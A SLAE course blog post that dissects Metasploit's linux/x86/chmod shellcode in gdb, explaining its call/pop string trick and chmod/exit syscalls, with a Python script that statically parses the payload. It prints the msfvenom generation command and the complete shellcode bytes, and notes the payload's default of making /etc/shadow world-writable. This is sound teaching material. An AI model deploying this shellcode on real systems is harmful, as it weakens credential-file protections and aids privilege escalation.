SLAE Assignment 5.3 - Msfvenom linux/x86/chmod shellcode Analysis

    Student SLAE - 891

    Assignment 5.3:

    Our Goal:

    Take up at least 3 linux/x86 shellcodes using Msfpayload (now Msfvenom)

    • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
    • Present your analysis

    Hello everybody,

    Here we are for the last shellcode of the msfvenom series. This time we will take the linux/x86/chmod shellcode and analyse it with GDB:

    # msfvenom -p linux/x86/chmod --payload-options
    Options for payload/linux/x86/chmod:
           Name: Linux Chmod
           Module: payload/linux/x86/chmod
           Platform: Linux
           Arch: x86
           Needs Admin: No
           Total size: 36
           Rank: Normal
    Provided by:
        kris katterjohn <[email protected]>
    Basic options:
    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
    FILE  /etc/shadow      yes       Filename to chmod
    MODE  0666             yes       File mode (octal)
      Runs chmod on specified file with specified mode

    Let’s generate the ELF:

    # msfvenom -p linux/x86/chmod FILE=/tmp/slae.txt -f elf -o chmod_slae
    No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    No Arch selected, selecting Arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 38 bytes
    Final size of elf file: 122 bytes
    Saved as: chmod_slae
    # ls -l /tmp/slae.txt 
    -r--r--r-- 1 root root 0 April 22 04:54 /tmp/slae.txt
    # chmod +x ./chmod_slae && ./chmod_slae
    # ls -l /tmp/slae.txt 
    -rw-rw-rw- 1 root root 0 April 22 04:54 /tmp/slae.txt

    Perfect, we see that our file /tmp/slae.txt now has the octal mode 666, i.e. rw-rw-rw-. Let's have a look in gdb:

    # readelf -h ./chmod_slae
    Entry point address:          0x8048054 
    # gdb -q ./chmod_slae 
    Reading symbols from ./chmod_slae...(no debugging symbols found)...done.
    gdb-peda$ br *0x8048054
    Breakpoint 1 at 0x8048054
    gdb-peda$ run
    gdb-peda$ disas $eip,+38
    Dump of assembler code from 0x8048054 to 0x804807a:
    => 0x08048054:	cdq    
       0x08048055:	push   0xf
       0x08048057:	pop    eax
       0x08048058:	push   edx
       0x08048059:	call   0x804806c
       0x0804805e:	das    
       0x0804805f:	je     0x80480ce
       0x08048061:	jo     0x8048092
       0x08048063:	jae    0x80480d1
       0x08048065:	popa   
       0x08048066:	gs cs je 0x80480e2
       0x0804806a:	je     0x804806c
       0x0804806c:	pop    ebx
       0x0804806d:	push   0x1b6
       0x08048072:	pop    ecx
       0x08048073:	int    0x80
       0x08048075:	push   0x1
       0x08048077:	pop    eax
       0x08048078:	int    0x80
    End of assembler dump.

    Before going further, note that the bytes between the call at 0x8048059 and its target 0x804806c are not code at all: they are the string "/tmp/slae.txt" plus its terminating NUL, which the call jumps over, and gdb has decoded them as meaningless instructions (das, je, jo, popa, ...). Also, cdq only sign-extends EAX into EDX and push edx leaves that value on the stack; the chmod syscall reads EBX and ECX only, so neither instruction influences the result. Let's add some breakpoints on the interesting instructions:

    gdb-peda$ br *0x0804806c
    Breakpoint 2 at 0x804806c
    gdb-peda$ br *0x08048073
    Breakpoint 3 at 0x8048073
    gdb-peda$ br *0x08048078
    Breakpoint 4 at 0x8048078
    gdb-peda$ c
    EAX: 0xf 
    EBX: 0x0 
    ECX: 0x0 
    EDX: 0x0 
    ESI: 0x0 
    EDI: 0x0 
    EBP: 0x0 
    ESP: 0xbffff2c8 --> 0x804805e ("/tmp/slae.txt")
    EIP: 0x804806c --> 0x1b6685b
    EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
       0x8048065:	popa   
       0x8048066:	gs cs je 0x80480e2
       0x804806a:	je     0x804806c
    => 0x804806c:	pop    ebx
       0x804806d:	push   0x1b6
       0x8048072:	pop    ecx
       0x8048073:	int    0x80
       0x8048075:	push   0x1
    0000| 0xbffff2c8 --> 0x804805e ("/tmp/slae.txt")
    0004| 0xbffff2cc --> 0x0 
    0008| 0xbffff2d0 --> 0x1 
    0012| 0xbffff2d4 --> 0xbffff478 ("/root/Documents/pentest/certs/slae/exam/assignment5.3/chmod_slae")
    0016| 0xbffff2d8 --> 0x0 
    0020| 0xbffff2dc --> 0xbffff4b9 ("XDG_VTNR=2")
    0024| 0xbffff2e0 --> 0xbffff4c4 ("XDG_SESSION_ID=2")
    0028| 0xbffff2e4 --> 0xbffff4d5 ("SSH_AGENT_PID=1067")
    Legend: code, data, rodata, value

    Notice that we are using gdb-peda, which prints the register and stack context at every stop. The call pushed its return address, 0x804805e, which is exactly where the string "/tmp/slae.txt" starts (see the top of the stack above), and the next instruction pop ebx pops that address into EBX. This call/pop trick is how the payload obtains the address of the string without knowing where it is loaded.

    So we will have:

    EAX: 0xf 
    EBX: 0x804805e (/tmp/slae.txt) 

    Finally, if we stop at address 0x8048073, just before the syscall:

    EAX: 0xf 
    EBX: 0x804805e ("/tmp/slae.txt")
    ECX: 0x1b6 

    With EAX = 0xf (15, the number of sys_chmod on x86) this is int chmod(const char *pathname, mode_t mode);. The second argument 0x1b6 is 666 in octal, the default MODE of the payload:

    # printf "%o\n" 0x1b6
    666

    Let's go to the next breakpoint:

    EAX: 0x1 
    EBX: 0x804805e (/tmp/slae.txt) 

    With EAX = 1 this is void _exit(int status);. EBX still holds the address of the string, so the exit status will be whatever the low byte of that address is; the status is not important in a shellcode execution context, so the payload does not spend an instruction setting EBX.

    Finally, stepping over the last syscall, our shellcode has changed the permissions of the file and the process exits:

    gdb-peda$ n
    [Inferior 1 (process 24785) exited with code 0136]
    Warning: not running or target is remote

    gdb reports the exit code in octal: 0136 is 0x5e, the low byte of the string address 0x804805e that was left in EBX, as predicted.
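
    As an added example (not part of the original post and not Metasploit's own code), the following Python script performs the same recovery statically. It reassembles the 38 payload bytes from the gdb disassembly above (a constructed input), locates the call/pop idiom to extract the FILE string, decodes the push 0x1b6 / pop ecx pair to get the MODE, collects the push imm8 / pop eax syscall-number loads, and, given the ELF entry point 0x8048054, computes the address that ends up in EBX and therefore the exit status. The function and constant names (analyse_chmod_payload, CHMOD_PAYLOAD, SYS_CHMOD, SYS_EXIT) are my own.

```python
import struct

# Constructed input: the 38 payload bytes of linux/x86/chmod FILE=/tmp/slae.txt,
# reassembled from the gdb disassembly in the post. The 14 bytes after the
# call are data ("/tmp/slae.txt\0"), which is why gdb decoded them as junk.
CHMOD_PAYLOAD = (
    b"\x99"                   # cdq               (edx unused by sys_chmod)
    b"\x6a\x0f"               # push 0xf
    b"\x58"                   # pop eax           eax = 15 = sys_chmod
    b"\x52"                   # push edx          dead push, never popped
    b"\xe8\x0e\x00\x00\x00"   # call +0xe         pushes &string as return addr
    b"/tmp/slae.txt\x00"      # FILE, skipped over by the call
    b"\x5b"                   # pop ebx           ebx = &"/tmp/slae.txt"
    b"\x68\xb6\x01\x00\x00"   # push 0x1b6
    b"\x59"                   # pop ecx           ecx = 0o666
    b"\xcd\x80"               # int 0x80          chmod(ebx, ecx)
    b"\x6a\x01"               # push 1
    b"\x58"                   # pop eax           eax = 1 = sys_exit
    b"\xcd\x80"               # int 0x80          exit(ebx & 0xff)
)

SYS_CHMOD = 15
SYS_EXIT = 1


def analyse_chmod_payload(code, base=0):
    """Statically recover what the payload will pass to the kernel.

    `code` is the raw payload, `base` the address its first byte is loaded at
    (0x8048054 for the ELF in the post). The function locates the call/pop
    idiom (a forward rel32 call with a NUL-terminated string between the call
    and its target), decodes the `push imm32 ; pop ecx` that follows the
    `pop ebx`, and collects every `push imm8 ; pop eax` syscall-number load.
    It is a pattern matcher for this payload shape, not a disassembler.
    """
    # Syscall numbers: push imm8 (0x6a xx) immediately followed by pop eax (0x58).
    syscalls = [code[j + 1] for j in range(len(code) - 2)
                if code[j] == 0x6a and code[j + 2] == 0x58]

    for i in range(len(code) - 4):
        if code[i] != 0xe8:
            continue
        rel = struct.unpack_from("<i", code, i + 1)[0]
        str_off = i + 5                 # return address pushed by the call
        target = str_off + rel          # where execution resumes (pop ebx)
        if rel <= 0 or target + 7 > len(code):
            continue
        nul = code.find(b"\x00", str_off, target)
        if nul < 0:
            continue
        path = code[str_off:nul].decode("ascii")
        break
    else:
        raise ValueError("no call/pop string reference found")

    # Expect: pop ebx (5b) ; push imm32 (68 xx xx xx xx) ; pop ecx (59)
    if code[target] != 0x5b or code[target + 1] != 0x68 or code[target + 6] != 0x59:
        raise ValueError("unexpected instructions at call target")
    mode = struct.unpack_from("<I", code, target + 2)[0]

    path_addr = base + str_off
    return {
        "syscalls": syscalls,
        "path": path,
        "path_addr": path_addr,
        "mode": mode,                     # oct(mode) reads as chmod's argument
        "exit_status": path_addr & 0xff,  # ebx is never reloaded before sys_exit
    }


if __name__ == "__main__":
    r = analyse_chmod_payload(CHMOD_PAYLOAD, base=0x8048054)
    print("syscalls   :", r["syscalls"])
    print("FILE       :", r["path"], "at", hex(r["path_addr"]))
    print("MODE       :", oct(r["mode"]))
    print("exit status:", oct(r["exit_status"]), "(gdb prints it in octal)")
```

    Run it with the entry point from readelf as `base` and it reports the same FILE, MODE and exit status that gdb showed dynamically; with `base=0` it still recovers FILE and MODE, which is what you get from a payload blob whose load address you do not know yet.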

    So we have just finished our msfvenom shellcode series. Soon we will deal with polymorphic shellcodes and crypters.
    Hope you enjoyed this post.